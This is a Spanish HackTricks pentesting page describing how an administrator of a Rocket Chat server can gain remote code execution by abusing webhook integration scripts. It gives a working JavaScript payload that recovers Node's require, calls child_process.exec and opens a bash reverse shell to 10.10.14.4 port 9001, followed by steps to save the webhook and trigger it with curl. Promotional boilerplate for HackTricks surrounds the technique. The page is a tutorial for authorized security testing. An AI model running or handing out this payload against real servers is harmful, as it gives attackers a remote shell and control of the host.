Rocket Chat

Aprende hacking de AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
Obtén la merchandising oficial de PEASS & HackTricks
Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

{% embed url="https://websec.nl/" %}

RCE

Si eres administrador dentro de Rocket Chat puedes obtener RCE.

Ve a Integrations y selecciona Nueva Integración y elige cualquiera: Incoming WebHook o Outgoing WebHook.
/admin/integrations/incoming

Según la documentación, ambos utilizan ES2015 / ECMAScript 6 (básicamente JavaScript) para procesar los datos. Así que obtengamos un rev shell para javascript como:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Configurar el WebHook (el canal y publicar como nombre de usuario deben existir):

Configurar el script del WebHook:

Guardar cambios
Obtener la URL del WebHook generada:

Llámalo con curl y deberías recibir la rev shell

{% embed url="https://websec.nl/" %}

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
Obtén la merchandising oficial de PEASS & HackTricks
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.

4 KiB Raw Blame History

Rocket Chat

RCE

4 KiB

Raw Blame History